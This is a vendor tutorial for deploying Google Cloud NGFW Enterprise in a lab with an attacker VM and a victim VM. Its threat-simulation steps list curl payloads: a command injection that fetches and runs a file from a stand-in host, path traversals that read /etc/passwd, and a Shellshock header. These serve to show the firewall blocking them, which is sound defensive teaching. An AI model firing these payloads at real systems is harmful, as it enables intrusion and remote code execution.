google-cloud-ngfw-tutorial

Learn how to deploy and use Google Cloud Firewall plus, a native Google Cloud service powered by Palo Alto Networks Threat Prevention technologies.

Google Cloud NGFW Enterprise Tutorial

This tutorial shows how to deploy and use Google Cloud NGFW Enterprise, a native Google Cloud service powered by Palo Alto Networks Threat Prevention technologies.

Cloud NGFW Enterprise is a fully distributed firewall service with advanced protection capabilities, micro-segmentation, and pervasive coverage to protect your Google Cloud workloads from internal and external threats, including intrusion, malware, spyware, and command-and-control. The service works by creating Google-managed zonal firewall endpoints that use packet intercept technology to transparently inspect workload traffic for the configured threat signatures and protect the workloads against those threats.


[!NOTE]

Cloud NGFW Enterprise is currently in public preview.

Requirements

Topology

Below is a diagram of the tutorial.

A VPC network contains two virtual machines (attacker and victim) that are used to simulate threats. Each virtual machine has an external address associated with its network interface to provide internet connectivity.

When Cloud NGFW is enabled, Google Cloud firewall rules intercept VPC network traffic (including north-south and east-west) and redirect it to the firewall endpoint for inspection. All actions taken by the service are logged directly in the Google Cloud console for you.

Prepare for deployment

Prepare for deployment by enabling the required APIs, retrieving the deployment files, and configuring the environment variables.


[!IMPORTANT]

This tutorial assumes you are using Cloud Shell to provision all of the resources.

  1. Open Google Cloud Shell and enable the required APIs.

    gcloud services enable compute.googleapis.com
    gcloud services enable networksecurity.googleapis.com
    
  2. List your Organization ID(s).

    gcloud organizations list
    
  3. Set the desired Organization ID to the environment variable ORG_ID.

  4. List your projects within your selected organization.

    gcloud alpha projects list --organization=$ORG_ID
    
  5. Set your desired deployment Project ID to the environment variable PROJECT_ID.

  6. Set your deployment Project ID in your gcloud configuration.

    gcloud config set project $PROJECT_ID
    
  7. Set your Google Cloud billing Project ID to the environment variable BILLING_PROJECT_ID.

  8. Set values for the deployment's REGION, ZONE, and naming PREFIX.


[!NOTE]

prefix is a string of characters that is prepended to the name of each created resource.

  9. Select a deployment option. Both options deploy identical environments.

    Option 1. Scripted Deployment
    - All of the cloud resources required for the tutorial are deployed using a single script.
    - Best for users who are familiar with Cloud NGFW Enterprise and want to quickly test use cases.

    Option 2. Step-by-step Deployment
    - Each cloud resource is deployed individually through gcloud.
    - Best for users who are new to Cloud NGFW Enterprise or want control over which resources are deployed.

Scripted Deployment

  1. In Cloud Shell, clone the repository and change directories.

    git clone https://github.com/PaloAltoNetworks/google-cloud-ngfw-enterprise-tutorial
    cd google-cloud-ngfw-enterprise-tutorial
    
  2. Execute the script to create the environment.

    ./ips_create.sh
    
  3. When the script completes, proceed to Simulate Threats.


[!IMPORTANT]

The script can take up to 45 minutes to complete.

Step-by-Step Deployment

  1. In Cloud Shell, create a VPC network, subnetwork, and firewall rule to allow all ingress traffic.

    gcloud compute networks create $PREFIX-vpc \
        --subnet-mode=custom \
        --project=$PROJECT_ID
    
    gcloud compute networks subnets create $PREFIX-subnet \
        --network=$PREFIX-vpc \
        --range=10.0.0.0/24 \
        --region=$REGION \
        --project=$PROJECT_ID
    
    gcloud compute firewall-rules create $PREFIX-all-ingress \
        --network=$PREFIX-vpc \
        --direction=ingress \
        --allow=all \
        --source-ranges=0.0.0.0/0 \
        --project=$PROJECT_ID
    
  2. Create two virtual machines (attacker & victim). The machines will be used to simulate threats later.

    gcloud compute instances create $PREFIX-attacker \
        --zone=$ZONE \
        --machine-type=f1-micro \
        --image-project=ubuntu-os-cloud \
        --image-family=ubuntu-2004-lts \
        --network-interface subnet=$PREFIX-subnet,private-network-ip=10.0.0.10 \
        --project=$PROJECT_ID
    
    gcloud compute instances create $PREFIX-victim \
        --zone=$ZONE \
        --machine-type=f1-micro \
        --image-project=panw-gcp-team-testing \
        --image=debian-cloud-ids-victim \
        --network-interface subnet=$PREFIX-subnet,private-network-ip=10.0.0.20 \
        --project=$PROJECT_ID
    
  3. Create a security profile and a security profile group.

    gcloud beta network-security security-profiles threat-prevention create $PREFIX-profile \
        --location=global \
        --project=$PROJECT_ID \
        --organization=$ORG_ID \
        --quiet
    
    gcloud beta network-security security-profile-groups create $PREFIX-profile-group \
        --threat-prevention-profile "organizations/$ORG_ID/locations/global/securityProfiles/$PREFIX-profile" \
        --location=global \
        --project=$PROJECT_ID \
        --organization=$ORG_ID \
        --quiet
    

    💡 Objective: Security profiles define layer 7 inspection policies for Google Cloud resources, offering application layer services like intrusion prevention through firewall endpoints. Security profile groups serve as a container for these profiles and are referenced within firewall policies to redirect network traffic.

  4. Set the security profile's action to ALERT for threats of severity INFORMATIONAL and LOW, and to DENY (block) for threats of severity MEDIUM, HIGH, and CRITICAL.

    gcloud beta network-security security-profiles threat-prevention add-override $PREFIX-profile \
        --severities=INFORMATIONAL,LOW \
        --action=ALERT \
        --location=global \
        --organization=$ORG_ID \
        --project=$PROJECT_ID
    
    gcloud beta network-security security-profiles threat-prevention add-override $PREFIX-profile \
        --severities=MEDIUM,HIGH,CRITICAL \
        --action=DENY \
        --location=global \
        --organization=$ORG_ID \
        --project=$PROJECT_ID
    

    💡 Objective: Each severity level has an associated default action. The default action specifies the action to take against threats based on the threat's severity level. You can use security profiles to override the default action for a severity level.
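    Because the profile lives at the organization level and can be edited outside this tutorial, it is worth checking after deployment that the overrides still say what step 4 intended. The following is an added example, not code from the tutorial repository: SAMPLE_PROFILE_JSON is a constructed stand-in for `threat-prevention describe --format=json` output (the threatPreventionProfile.severityOverrides field names are assumed), with the HIGH override deliberately wrong so that the audit reports a finding.

```shell
# Added check (not part of the tutorial): verify that a threat-prevention
# profile's severity overrides match what step 4 configures
# (INFORMATIONAL,LOW -> ALERT; MEDIUM,HIGH,CRITICAL -> DENY), so drift in
# an organization-level profile is caught. SAMPLE_PROFILE_JSON is a constructed
# stand-in for `security-profiles threat-prevention describe --format=json`
# output (field names assumed); HIGH is deliberately wrong to show a finding.
SAMPLE_PROFILE_JSON='{
  "name": "organizations/ORG_ID_PLACEHOLDER/locations/global/securityProfiles/demo-profile",
  "threatPreventionProfile": {
    "severityOverrides": [
      {"action": "ALERT", "severity": "INFORMATIONAL"},
      {"action": "ALERT", "severity": "LOW"},
      {"action": "DENY", "severity": "MEDIUM"},
      {"action": "ALERT", "severity": "HIGH"},
      {"action": "DENY", "severity": "CRITICAL"}
    ]
  }
}'

# override_action JSON SEVERITY -> the override's action, or DEFAULT_ACTION when
# the profile carries no override for that severity (the service default applies).
override_action() {
  action=$(printf '%s' "$1" | tr -d ' \n' \
    | grep -o "{[^{}]*\"severity\":\"$2\"[^{}]*}" \
    | sed -n 's/.*"action":"\([A-Z_]*\)".*/\1/p')
  echo "${action:-DEFAULT_ACTION}"
}

# expected_action SEVERITY -> the action the tutorial intends for that severity.
expected_action() {
  case "$1" in
    INFORMATIONAL|LOW)    echo ALERT ;;
    MEDIUM|HIGH|CRITICAL) echo DENY ;;
    *)                    echo DEFAULT_ACTION ;;
  esac
}

# audit_profile JSON -> one line per mismatch; returns 1 if any severity drifted.
audit_profile() {
  rc=0
  for sev in INFORMATIONAL LOW MEDIUM HIGH CRITICAL; do
    want=$(expected_action "$sev"); got=$(override_action "$1" "$sev")
    if [ "$want" != "$got" ]; then
      echo "MISMATCH $sev: expected $want, profile has $got"
      rc=1
    fi
  done
  return $rc
}
```

    Against the deployed profile, pass the real describe output instead of the sample: `audit_profile "$(gcloud beta network-security security-profiles threat-prevention describe $PREFIX-profile --location=global --organization=$ORG_ID --format=json)"`.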

  5. Create a firewall endpoint. The endpoint can take up to 25 minutes to fully provision.

    gcloud beta network-security firewall-endpoints create $PREFIX-endpoint \
        --zone=$ZONE \
        --billing-project=$BILLING_PROJECT_ID \
        --organization=$ORG_ID \
        --quiet
    
    while true; do
        STATUS_EP=$(gcloud beta network-security firewall-endpoints describe $PREFIX-endpoint \
            --zone=$ZONE \
            --project=$PROJECT_ID \
            --organization=$ORG_ID \
            --format="json" | jq -r '.state')
        if [[ "$STATUS_EP" == "ACTIVE" ]]; then
            echo "Firewall endpoint $PREFIX-endpoint is now active."
            sleep 2
            break
        fi
        echo "Waiting for the firewall endpoint to be created.  This can take up to 25 minutes..."
        sleep 5
    done
    

    💡 Objective: A firewall endpoint is an organizational resource that inspects intercepted traffic with Palo Alto Networks Threat Prevention technologies.

  6. Associate the endpoint with the VPC network. The association can take up to 30 minutes to complete.

    gcloud beta network-security firewall-endpoint-associations create $PREFIX-assoc \
        --endpoint "organizations/$ORG_ID/locations/$ZONE/firewallEndpoints/$PREFIX-endpoint" \
        --network=$PREFIX-vpc \
        --zone=$ZONE \
        --project=$PROJECT_ID \
        --quiet
    
    while true; do
        STATUS_ASSOC=$(gcloud beta network-security firewall-endpoint-associations describe $PREFIX-assoc \
            --zone=$ZONE \
            --project=$PROJECT_ID \
            --format="json" | jq -r '.state')
    
        if [[ "$STATUS_ASSOC" == "ACTIVE" ]]; then
            echo "Endpoint association $PREFIX-assoc is now active."
            sleep 2
            break
        fi
        echo "Waiting for the endpoint association to be created.  This can take up to 45 minutes..."
        sleep 1
    done
    

    💡 Objective: The firewall endpoint can be associated with one or more VPC networks within the same zone. If a firewall policy attached to your VPC network has layer 7 inspection enabled, matching traffic is transparently redirected to the endpoint for inspection.
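    The polling loops in steps 5 and 6 run until the resource reports ACTIVE and never give up, so an endpoint or association that stalls hangs the Cloud Shell session. The helper below is an added example, not code from the tutorial repository: it bounds the wait, stops early on a state that cannot become ACTIVE (DELETING and INACTIVE are assumed terminal), and uses gcloud's `--format="value(state)"` instead of the `json | jq` pipeline.

```shell
# Added helper (not part of the tutorial): bounded wait for a Cloud NGFW
# resource to reach ACTIVE. The tutorial's loops poll forever, so an endpoint
# or association that never activates hangs the Cloud Shell session.
#
# wait_for_active LABEL TIMEOUT_SECONDS CMD [ARGS...]
#   CMD must print the resource state (ACTIVE, CREATING, ...) on stdout.
#   Returns 0 on ACTIVE, 1 on timeout, 2 on a terminal non-active state.
#   POLL_INTERVAL (seconds, default 10) sets how often CMD is run.
wait_for_active() {
  label=$1; timeout=$2; shift 2
  interval=${POLL_INTERVAL:-10}
  elapsed=0
  while [ "$elapsed" -lt "$timeout" ]; do
    # A failing describe (resource not yet visible) counts as UNKNOWN, not fatal.
    state=$("$@" 2>/dev/null || echo UNKNOWN)
    case "$state" in
      ACTIVE)
        echo "$label is ACTIVE after ${elapsed}s"
        return 0 ;;
      DELETING|INACTIVE)  # assumed terminal states: waiting longer cannot help
        echo "$label entered state $state; giving up" >&2
        return 2 ;;
    esac
    echo "$label is ${state:-UNKNOWN}; waiting (${elapsed}/${timeout}s)..."
    sleep "$interval"
    elapsed=$((elapsed + interval))
  done
  echo "$label did not become ACTIVE within ${timeout}s" >&2
  return 1
}

# Usage with the tutorial's variables (needs gcloud; --format=value(state) avoids jq):
#   wait_for_active "endpoint $PREFIX-endpoint" 1500 \
#     gcloud beta network-security firewall-endpoints describe "$PREFIX-endpoint" \
#       --zone="$ZONE" --project="$PROJECT_ID" --organization="$ORG_ID" \
#       --format="value(state)"
#   wait_for_active "association $PREFIX-assoc" 1800 \
#     gcloud beta network-security firewall-endpoint-associations describe "$PREFIX-assoc" \
#       --zone="$ZONE" --project="$PROJECT_ID" --format="value(state)"
```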

  7. Create a Network Firewall Policy with two firewall rules to allow all ingress & egress traffic to the workload network.

    gcloud compute network-firewall-policies create $PREFIX-global-policy \
        --global \
        --project=$PROJECT_ID
    
    gcloud compute network-firewall-policies rules create 10 \
        --action=allow \
        --firewall-policy=$PREFIX-global-policy \
        --global-firewall-policy \
        --direction=INGRESS \
        --enable-logging \
        --layer4-configs all \
        --src-ip-ranges=0.0.0.0/0 \
        --dest-ip-ranges=0.0.0.0/0 \
        --project=$PROJECT_ID
    
    gcloud compute network-firewall-policies rules create 11 \
        --action=allow \
        --firewall-policy=$PREFIX-global-policy \
        --global-firewall-policy \
        --layer4-configs=all \
        --direction=EGRESS \
        --enable-logging \
        --src-ip-ranges=0.0.0.0/0 \
        --dest-ip-ranges=0.0.0.0/0 \
        --project=$PROJECT_ID
    

    💡 Objective: A Network Firewall Policy can be shared across networks within a Google Cloud organization. This simplifies the configuration and management of firewall rules. The firewall policies created here do not yet redirect traffic to the firewall endpoint; that is done later in the tutorial.

  8. Associate the Network Firewall Policy with the VPC network that contains the workload machines.

    gcloud compute network-firewall-policies associations create \
        --firewall-policy=$PREFIX-global-policy \
        --network=$PREFIX-vpc \
        --name=$PREFIX-global-policy-association \
        --global-firewall-policy \
        --project=$PROJECT_ID
    

    💡 Objective: A Network Firewall Policy is an organizational resource, enabling you to apply policies across networks, projects, and folders.

  9. (Optional) Review the created resources.

Simulate threats without Cloud NGFW Enterprise

Simulate threats between the attacker and victim virtual machines without Cloud NGFW inspection. Deep packet inspection does not occur because the firewall policies created in the previous step do not intercept traffic for inspection by the firewall endpoint.

  1. In Cloud Shell, open an SSH session to the attacker VM.

    gcloud compute ssh paloalto@$PREFIX-attacker --zone=$ZONE --project=$PROJECT_ID
    
  2. From the attacker VM, simulate pseudo-threats against the victim VM (10.0.0.20).

    curl "http://10.0.0.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil"
    curl http://10.0.0.20/?item=../../../../WINNT/win.ini -m 5
    curl http://10.0.0.20/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 5
    curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' -m 5 http://10.0.0.20/cgi-bin/test-critical
    
  3. Attempt to download a pseudo-malicious file (the EICAR test file) from the internet.

    wget www.eicar.eu/eicar.com.txt --tries 1 --timeout 2
    

    💡 Objective: The above threat simulations should be successful. This is because the firewall endpoint is not inspecting the traffic between the attacker and victim virtual machines.

Prevent threats with Cloud NGFW Enterprise

Cloud NGFW Enterprise uses Google Cloud's packet intercept technology to transparently redirect traffic from workloads to firewall endpoints. Traffic redirection is defined within network firewall rules which have the security profile group set as the action.

Update network firewall policies

Update the network firewall policies to redirect traffic to the firewall endpoint. The action defined in the firewall rule determines which security profile group is applied to the traffic.

  1. Modify the ingress & egress firewall rules within the global network policy so that matching traffic is redirected to the firewall endpoint.

    gcloud beta compute network-firewall-policies rules update 10 \
        --action=apply_security_profile_group \
        --firewall-policy=$PREFIX-global-policy \
        --global-firewall-policy \
        --project=$PROJECT_ID \
        --security-profile-group=//networksecurity.googleapis.com/organizations/$ORG_ID/locations/global/securityProfileGroups/$PREFIX-profile-group
    
    gcloud beta compute network-firewall-policies rules update 11 \
        --action=apply_security_profile_group \
        --firewall-policy=$PREFIX-global-policy \
        --global-firewall-policy \
        --project=$PROJECT_ID \
        --security-profile-group=//networksecurity.googleapis.com/organizations/$ORG_ID/locations/global/securityProfileGroups/$PREFIX-profile-group
    

Replay threats

Simulate the previous threats again to see the action taken by Cloud NGFW.

  1. In Cloud Shell, open an SSH session to the attacker VM (password: kali).

    gcloud compute ssh paloalto@$PREFIX-attacker --zone=$ZONE --project=$PROJECT_ID
    
  2. From the attacker VM, simulate pseudo-threats against the victim VM (10.0.0.20).

    curl "http://10.0.0.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil"
    curl http://10.0.0.20/?item=../../../../WINNT/win.ini -m 5
    curl http://10.0.0.20/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 5
    curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' -m 5 http://10.0.0.20/cgi-bin/test-critical
    
  3. Attempt to download a pseudo-malicious file (the EICAR test file) from the internet.

    wget www.eicar.eu/eicar.com.txt --tries 1 --timeout 2
    

    💡 Objective: The simulated threats from the attacker should fail. This is because the Cloud NGFW service is preventing the threats from reaching the victim machine.

View threats

View the actions taken by the Cloud NGFW service directly within the Google Cloud console.

  1. In the Google Cloud console, go to Network Security → Threats.

    💡 Objective: You should see the actions taken by the firewall endpoint, indicating the service has detected and/or stopped the simulated threats.

    The action taken against a threat is determined by the security profile group applied to the network firewall rule.

Clean up

To delete the created resources, delete your Google Cloud deployment project. If you cannot delete your deployment project, follow the steps below to delete the cloud resources created in this tutorial.

  1. If you chose the Step-by-Step Deployment, clone the repository in Cloud Shell.

    git clone https://github.com/PaloAltoNetworks/google-cloud-ngfw-enterprise-tutorial
    cd google-cloud-ngfw-enterprise-tutorial
    
  2. Execute the script to delete the resources created in this tutorial.

    ./ips_delete
    

Copyright © 2024 Palo Alto Networks, Inc. All rights reserved.